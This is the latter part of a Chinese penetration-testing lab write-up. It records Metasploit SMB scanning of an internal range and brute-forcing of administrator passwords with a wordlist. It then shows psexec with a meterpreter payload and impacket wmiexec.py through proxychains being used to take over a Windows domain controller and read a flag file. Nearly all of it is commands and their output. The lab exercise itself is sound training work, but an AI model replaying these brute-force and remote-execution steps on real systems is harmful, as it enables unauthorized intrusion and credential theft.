[-] 192.168.93.4:445 - 192.168.93.4: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.3:445 - 192.168.93.3: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.5:445 - 192.168.93.5: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.1:139 - 192.168.93.1: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.2:139 - 192.168.93.2: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.4:139 - 192.168.93.4: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.5:139 - 192.168.93.5: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.3:139 - 192.168.93.3: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.6:445 - 192.168.93.6: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.7:445 - 192.168.93.7: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.8:445 - 192.168.93.8: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.9:445 - 192.168.93.9: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[*] 192.168.93.10:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:required) (uptime:1w 2d 19h 13m 13s) (guid:{74fd7a72-fc98-4951-9b1b-01e0f1cf7935}) (authentication domain:TEST)Windows 2012 R2 Datacenter (build:9600) (name:WIN-8GA56TNV3MV) (domain:TEST)
[+] 192.168.93.10:445 - Host is running SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:required) (uptime:1w 2d 19h 13m 13s) (guid:{74fd7a72-fc98-4951-9b1b-01e0f1cf7935}) (authentication domain:TEST)Windows 2012 R2 Datacenter (build:9600) (name:WIN-8GA56TNV3MV) (domain:TEST)
[-] 192.168.93.6:139 - 192.168.93.6: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.7:139 - 192.168.93.7: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.9:139 - 192.168.93.9: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.8:139 - 192.168.93.8: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.12:445 - 192.168.93.12: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.11:445 - 192.168.93.11: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.13:445 - 192.168.93.13: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.14:445 - 192.168.93.14: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.15:445 - 192.168.93.15: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.12:139 - 192.168.93.12: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.11:139 - 192.168.93.11: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.13:139 - 192.168.93.13: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.14:139 - 192.168.93.14: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.15:139 - 192.168.93.15: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[*] 192.168.93.20:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.0.2) (signatures:optional) (uptime:207w 1d 13h 49m 52s) (guid:{f9644969-0bf4-48c7-ab87-58ba8044ed81}) (authentication domain:TEST)Windows 2008 Datacenter SP2 (build:6003) (name:WIN2008) (domain:TEST)
[+] 192.168.93.20:445 - Host is running SMB Detected (versions:1, 2) (preferred dialect:SMB 2.0.2) (signatures:optional) (uptime:207w 1d 13h 49m 52s) (guid:{f9644969-0bf4-48c7-ab87-58ba8044ed81}) (authentication domain:TEST)Windows 2008 Datacenter SP2 (build:6003) (name:WIN2008) (domain:TEST)
[-] 192.168.93.16:445 - 192.168.93.16: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.17:445 - 192.168.93.17: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.18:445 - 192.168.93.18: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.19:445 - 192.168.93.19: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.16:139 - 192.168.93.16: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.17:139 - 192.168.93.17: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.18:139 - 192.168.93.18: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.19:139 - 192.168.93.19: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.21:445 - 192.168.93.21: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.22:445 - 192.168.93.22: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.23:445 - 192.168.93.23: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.24:445 - 192.168.93.24: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.25:445 - 192.168.93.25: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.21:139 - 192.168.93.21: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.22:139 - 192.168.93.22: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.23:139 - 192.168.93.23: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.24:139 - 192.168.93.24: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.25:139 - 192.168.93.25: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[*] 192.168.93.0-255: - Scanned 26 of 256 hosts (10% complete)
[-] 192.168.93.26:445 - 192.168.93.26: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[*] 192.168.93.30:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:213w 4d 10h 36m 33s) (guid:{5cc9a08c-4395-4e1d-95be-f93ec2195144}) (authentication domain:TEST)Windows 7 Professional SP1 (build:7601) (name:WIN7) (domain:TEST)
[+] 192.168.93.30:445 - Host is running SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:213w 4d 10h 36m 33s) (guid:{5cc9a08c-4395-4e1d-95be-f93ec2195144}) (authentication domain:TEST)Windows 7 Professional SP1 (build:7601) (name:WIN7) (domain:TEST)
还是三台内网主机
192.168.93.10 name:WIN-8GA56TNV3MV domain:TEST
192.168.93.20 name:WIN2008 domain:TEST
192.168.93.30 name:WIN7 domain:TEST
6、内网攻击
1、密码爆破
使用use auxiliary/scanner/smb/smb_login模块,进行smb爆破192.168.93.10/20/30的密码
msf6 auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/smb/smb_login
msf6 auxiliary(scanner/smb/smb_login) > show options
Module options (auxiliary/scanner/smb/smb_login):
Name Current Setting Required Description
---- --------------- -------- -----------
ABORT_ON_LOCKOUT false yes Abort the run when an account lockout is detected
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
DETECT_ANY_AUTH false no Enable detection of systems accepting any authentication
DETECT_ANY_DOMAIN false no Detect if domain is required for the specified user
PASS_FILE no File containing passwords, one per line
PRESERVE_DOMAINS true no Respect a username that contains a domain name.
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RECORD_GUEST false no Record guest-privileged random logins to the database
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/smb/smb_login) > set SMBUser administrator
SMBUser => administrator
msf6 auxiliary(scanner/smb/smb_login) > run
[-] Msf::OptionValidateError The following options failed to validate: RHOSTS
msf6 auxiliary(scanner/smb/smb_login) > set rhosts 192.168.93.30
rhosts => 192.168.93.30
msf6 auxiliary(scanner/smb/smb_login) > run
[*] 192.168.93.30:445 - 192.168.93.10:445 - Starting SMB login bruteforce
[*] 192.168.93.30:445 - Error: 192.168.93.30: Metasploit::Framework::LoginScanner::Invalid Cred details can't be blank, Cred details can't be blank (Metasploit::Framework::LoginScanner::SMB)
[*] 192.168.93.30:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_login) >
这个报错是因为没有加载爆破字典
msf6 auxiliary(scanner/smb/smb_login) > set PASS_FILE /usr/share/wordlists/rockyou.txt
PASS_FILE => /usr/share/wordlists/rockyou.txt
msf6 auxiliary(scanner/smb/smb_login) > set rhosts 192.168.93.30
rhosts => 192.168.93.30
msf6 auxiliary(scanner/smb/smb_login) > run
msf6 auxiliary(scanner/smb/smb_login) > run
[*] 192.168.93.30:445 - 192.168.93.30:445 - Starting SMB login bruteforce
[-] 192.168.93.30:445 - 192.168.93.30:445 - Failed: '.\administrator:This is not a password',
[!] 192.168.93.30:445 - No active DB -- Credential data will not be saved!
[-] 192.168.93.30:445 - 192.168.93.30:445 - Failed: '.\administrator:zxcASDqwe!ASD',
[+] 192.168.93.30:445 - 192.168.93.30:445 - Success: '.\administrator:123qwe!ASD' Administrator
msf6 auxiliary(scanner/smb/smb_login) > set rhosts 192.168.93.20
rhosts => 192.168.93.20
msf6 auxiliary(scanner/smb/smb_login) > run
[*] 192.168.93.20:445 - 192.168.93.20:445 - Starting SMB login bruteforce
[-] 192.168.93.20:445 - 192.168.93.20:445 - Failed: '.\administrator:This is not a password',
[!] 192.168.93.20:445 - No active DB -- Credential data will not be saved!
[-] 192.168.93.20:445 - 192.168.93.20:445 - Failed: '.\administrator:zxcASDqwe!ASD',
[+] 192.168.93.20:445 - 192.168.93.20:445 - Success: '.\administrator:123qwe!ASD' Administrator
^C[*] 192.168.93.20:445 - Caught interrupt from the console...
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_login) > set rhosts 192.168.93.10
msf6 auxiliary(scanner/smb/smb_login) > run
[*] 192.168.93.10:445 - 192.168.93.10:445 - Starting SMB login bruteforce
[-] 192.168.93.10:445 - 192.168.93.10:445 - Failed: '.\administrator:This is not a password',
[!] 192.168.93.10:445 - No active DB -- Credential data will not be saved!
[+] 192.168.93.10:445 - 192.168.93.10:445 - Success: '.\administrator:zxcASDqw123!!' Administrator
^C[*] 192.168.93.10:445 - Caught interrupt from the console...
[*] Auxiliary module execution completed
192.168.93.30 administrator:123qwe!ASD
192.168.93.20 administrator:123qwe!ASD
192.168.93.10 administrator:zxcASDqw123!!
这样我们就已经拿到所有主机的密码了。
2、psexec工具
利用psexec工具进行攻击内网主机。
192.168.93.30攻击流程
msf6 auxiliary(scanner/smb/smb_login) > use exploit/windows/smb/psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf6 exploit(windows/smb/psexec) > set SMBUser administrator
SMBUser => administrator
msf6 exploit(windows/smb/psexec) > set SMBPass 123qwe!ASD
SMBPass => 123qwe!ASD
msf6 exploit(windows/smb/psexec) > set rhosts 192.168.93.30
rhosts => 192.168.93.30
msf6 exploit(windows/smb/psexec) > show options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.93.30 yes The target host(s), see https
://docs.metasploit.com/docs/u
sing-metasploit/basics/using-
metasploit.html
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTI no Service description to be use
ON d on target for pretty listin
g
SERVICE_DISPLAY_N no The service display name
AME
SERVICE_NAME no The service name
SMBDomain . no The Windows domain to use for
authentication
SMBPass 123qwe!ASD no The password for the specifie
d username
SMBSHARE no The share to connect to, can
be an admin share (ADMIN$,C$,
...) or a normal read/write f
older share
SMBUser administrator no The username to authenticate
as
Payload options (windows/x64/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thr
ead, process, none)
LPORT 4444 yes The listen port
RHOST 192.168.93.30 no The target address
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(windows/smb/psexec) > run
[*] 192.168.93.30:445 - Connecting to the server...
[*] 192.168.93.30:445 - Authenticating to 192.168.93.30:445 as user 'administrator'...
[*] 192.168.93.30:445 - Selecting PowerShell target
[*] 192.168.93.30:445 - Executing the payload...
[+] 192.168.93.30:445 - Service start timed out, OK if running a command or non-service executable...
[*] Started bind TCP handler against 192.168.93.30:4444
[*] Sending stage (200774 bytes) to 192.168.93.30
[*] Meterpreter session 5 opened (192.168.93.100:34678 -> 192.168.93.30:4444 via session 4) at 2023-12-04 10:28:38 +0800
meterpreter >
查找域控主机
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run post/windows/gather/enum_domain
[+] Domain FQDN: test.org
[+] Domain NetBIOS Name: TEST
[+] Domain Controller: WIN-8GA56TNV3MV.test.org (IP: 192.168.93.10)
meterpreter >
域控主机为192.168.93.10
信息收集
meterpreter > shell
Process 1228 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>ipconfig /all
ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : win7
Primary Dns Suffix . . . . . . . : test.org
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : test.org
Ethernet adapter Bluetooth Network Connection:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Bluetooth Device (Personal Area Network)
Physical Address. . . . . . . . . : 3C-55-76-DC-AB-F6
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
Physical Address. . . . . . . . . : 00-0C-29-E0-74-2B
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Link-local IPv6 Address . . . . . : fe80::fcc9:1e77:245c:9cf3%11(Preferred)
IPv4 Address. . . . . . . . . . . : 192.168.93.30(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
DHCPv6 IAID . . . . . . . . . . . : 234884137
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-25-2C-53-70-00-0C-29-E0-74-2B
DNS Servers . . . . . . . . . . . : 192.168.93.10
NetBIOS over Tcpip. . . . . . . . : Enabled
Tunnel adapter isatap.{9155D380-FF00-44EB-AE88-938EA5D2CAB2}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Microsoft ISATAP Adapter
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Tunnel adapter isatap.{A0E4F0B0-B72B-4DC5-8935-EA51628015E2}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
C:\Windows\system32>net user
net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator Guest
3、wmiexec.py
wmiexec.py 是一个工具,用于在 Windows 操作系统上执行 WMI (Windows Management Instrumentation) 命令和脚本。WMI 是微软 Windows 管理架构的一部分,可用于管理和监控本地和远程计算机上的各种系统资源和服务。
wmiexec.py 工具允许用户在命令行界面上执行各种 WMI 命令和脚本,并与远程计算机进行通信。该工具通常被用于系统管理、故障排除和远程执行任务。
192.168.93.20攻击流程
┌──(root㉿ru)-[/usr/share/doc/python3-impacket/examples]
└─# proxychains4 python3 wmiexec.py 'administrator:123qwe!ASD@192.168.93.20'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.11.0 - Copyright 2023 Fortra
[proxychains] Strict chain ... 127.0.0.1:9898 ... 192.168.93.20:445 ... OK
[*] SMBv2.0 dialect used
[proxychains] Strict chain ... 127.0.0.1:9898 ... 192.168.93.20:135 ... OK
[proxychains] Strict chain ... 127.0.0.1:9898 ... 192.168.93.20:49154 ... OK
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : win2008
Primary Dns Suffix . . . . . . . : test.org
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : test.org
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
Physical Address. . . . . . . . . : 00-0C-29-AB-44-EC
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Link-local IPv6 Address . . . . . : fe80::e9c2:7728:85f1:d04f%10(Preferred)
IPv4 Address. . . . . . . . . . . : 192.168.93.20(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
DHCPv6 IAID . . . . . . . . . . . : 234884137
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-25-2C-55-47-00-0C-29-AB-44-EC
DNS Servers . . . . . . . . . . . : 192.168.93.10
NetBIOS over Tcpip. . . . . . . . : Enabled
Tunnel adapter Local Area Connection* 8:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : isatap.{964D2F17-AE7C-4B46-9E2B-EB123D2EEFEA}
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
C:\>net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator Guest
The command completed with one or more errors.
192.168.93.10攻击流程
┌──(root㉿ru)-[/usr/share/doc/python3-impacket/examples]
└─# proxychains python3 wmiexec.py 'administrator:zxcASDqw123!!@192.168.93.10'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.11.0 - Copyright 2023 Fortra
[proxychains] Strict chain ... 127.0.0.1:9898 ... 192.168.93.10:445 ... OK
[*] SMBv3.0 dialect used
[proxychains] Strict chain ... 127.0.0.1:9898 ... 192.168.93.10:135 ... OK
[proxychains] Strict chain ... 127.0.0.1:9898 ... 192.168.93.10:49154 ... OK
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : WIN-8GA56TNV3MV
Primary Dns Suffix . . . . . . . : test.org
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : test.org
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) 82574L Gigabit Network Connection
Physical Address. . . . . . . . . : 00-0C-29-1F-54-D2
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Link-local IPv6 Address . . . . . : fe80::1fa:2f8:97ac:1160%12(Preferred)
IPv4 Address. . . . . . . . . . . : 192.168.93.10(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
DHCPv6 IAID . . . . . . . . . . . : 301993001
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-25-2C-57-BB-00-0C-29-1F-54-D2
DNS Servers . . . . . . . . . . . : ::1
127.0.0.1
NetBIOS over Tcpip. . . . . . . . : Enabled
Tunnel adapter isatap.{22AC77BB-4205-4120-89CB-C8F5240403E0}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
C:\>net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator Guest krbtgt
win2008 win7
The command completed with one or more errors.
C:\Users\Administrator\Desktop>whoami
test\administrator
ok,利用impacket包里的wmiexec.py脚本成功将内网主机win2008(192.168.93.20)、WIN-8GA56TNV3MV(192.168.93.10 内网主机)打穿了。
7、get flag
┌──(root㉿ru)-[/usr/share/doc/python3-impacket/examples]
└─# proxychains python3 wmiexec.py 'administrator:zxcASDqw123!!@192.168.93.10'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.11.0 - Copyright 2023 Fortra
[proxychains] Strict chain ... 127.0.0.1:9898 ... 192.168.93.10:445 ... OK
[*] SMBv3.0 dialect used
[proxychains] Strict chain ... 127.0.0.1:9898 ... 192.168.93.10:135 ... OK
[proxychains] Strict chain ... 127.0.0.1:9898 ... 192.168.93.10:49154 ... OK
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>dir
Volume in drive C has no label.
Volume Serial Number is D6DC-065A
Directory of C:\
08/22/2013 11:52 PM <DIR> PerfLogs
10/28/2019 08:44 PM <DIR> Program Files
08/22/2013 11:39 PM <DIR> Program Files (x86)
10/06/2019 07:14 PM <DIR> Users
12/04/2023 11:18 AM <DIR> Windows
0 File(s) 0 bytes
5 Dir(s) 52,819,361,792 bytes free
C:\>cd Users
C:\Users>dir
Volume in drive C has no label.
Volume Serial Number is D6DC-065A
Directory of C:\Users
10/06/2019 07:14 PM <DIR> .
10/06/2019 07:14 PM <DIR> ..
10/06/2019 07:14 PM <DIR> Administrator
08/22/2013 11:39 PM <DIR> Public
0 File(s) 0 bytes
4 Dir(s) 52,819,361,792 bytes free
C:\Users>cd Administrator
C:\Users\Administrator>dir
Volume in drive C has no label.
Volume Serial Number is D6DC-065A
Directory of C:\Users\Administrator
10/06/2019 07:14 PM <DIR> .
10/06/2019 07:14 PM <DIR> ..
10/30/2019 10:12 PM <DIR> Contacts
10/31/2019 12:52 AM <DIR> Desktop
10/31/2019 12:52 AM <DIR> Documents
10/30/2019 10:12 PM <DIR> Downloads
10/30/2019 10:12 PM <DIR> Favorites
10/30/2019 10:12 PM <DIR> Links
10/30/2019 10:12 PM <DIR> Music
10/30/2019 10:12 PM <DIR> Pictures
10/30/2019 10:12 PM <DIR> Saved Games
10/30/2019 10:12 PM <DIR> Searches
10/30/2019 10:12 PM <DIR> Videos
0 File(s) 0 bytes
13 Dir(s) 52,819,357,696 bytes free
C:\Users\Administrator>cd Documents
C:\Users\Administrator\Documents>dir
Volume in drive C has no label.
Volume Serial Number is D6DC-065A
Directory of C:\Users\Administrator\Documents
10/31/2019 12:52 AM <DIR> .
10/31/2019 12:52 AM <DIR> ..
10/31/2019 12:53 AM 13 flag.txt
1 File(s) 13 bytes
2 Dir(s) 52,819,361,792 bytes free
C:\Users\Administrator\Documents>type flag.txt
this is flag!
C:\Users\Administrator\Documents>
最终我们在域控主机内拿到重要文件flag.txt文件。